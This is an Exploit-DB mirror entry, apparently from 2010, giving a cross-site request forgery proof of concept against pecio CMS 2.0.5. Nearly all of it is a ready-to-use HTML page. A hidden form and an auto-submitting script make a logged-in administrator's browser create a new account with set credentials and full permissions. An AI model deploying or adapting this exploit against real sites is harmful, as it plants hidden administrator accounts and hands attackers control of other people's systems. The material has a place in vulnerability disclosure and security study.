pecio CMS 2.0.5 – Cross-Site Request Forgery (Add Admin)

  • 作者: P0C T34M
    日期: 2010-12-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15835/
  • #Title: pecio CMS v2.0.5 <= CSRF Add Admin
#Script : pecio CMS v2.0.5 
#Language : Php
#Download : Download: http://pecio-cms.com/pec_upload/files/pecio-2.0.5.zip
#Date : 2010/12/25
#Found: by P0C T34M >> tnt-r00t 
#Homepage : www.p0c.cc

<html>
<form name="tnt" action="http://127.0.0.1/pec/pec_admin/admin.php?area=users&ampview=default&action=create" method="post">

<input type="hidden" name="user_name" type="hidden" value="myna0me"/ >
<input type="hidden" name="user_forename" type="hidden" value="r00t" />
<input type="hidden" name="user_surname" type="hidden" value="myname"/ >
<input type="hidden" name="user_email" type="hidden" value="r00t@cr.tr" />
<input type="hidden" name="user_password" type="hidden" value="r0o0t" />
<input type="hidden" name="user_password_repeat" type="hidden" value="r0o0t" />

<input type="hidden" name="user_perm_articles" id="perm_articles_full" value="2" checked="checked" type="radio">
<input type="hidden" name="user_perm_menupoints" id="perm_menupoints_none" value="2" checked="checked" type="radio">
<input type="hidden" name="user_perm_menupoints" id="perm_menupoints_full" value="2" checked="checked" type="radio">
<input type="hidden" name="user_perm_texts" id="perm_texts_full" value="2" checked="checked" type="radio"> 
<input type="hidden" name="user_perm_links" id="perm_links_full" value="2" checked="checked" type="radio">
<input type="hidden" name="user_perm_posts" id="perm_posts_full" value="2" checked="checked" type="radio"> 
<input type="hidden" name="user_perm_comments" id="perm_comments_full" value="2" checked="checked" type="radio"> 
<input type="hidden" name="user_perm_users" id="perm_users_full" value="2" checked="checked" type="radio">
<input type="hidden" name="user_perm_plugins" id="perm_plugins_full" value="2" checked="checked" type="radio"> 
<input type="hidden" name="user_perm_templates" id="perm_templates_full" value="2" checked="checked" type="radio">
<input type="hidden" name="user_perm_settings" id="perm_settings_full" value="2" checked="checked" type="radio">

<input type="hidden" name="Submit" class="submit" value="Add User" type="submit"/>
</form>
<script>document.tnt.submit();</script>
</html>
 
NickName : P0C T34M
    Python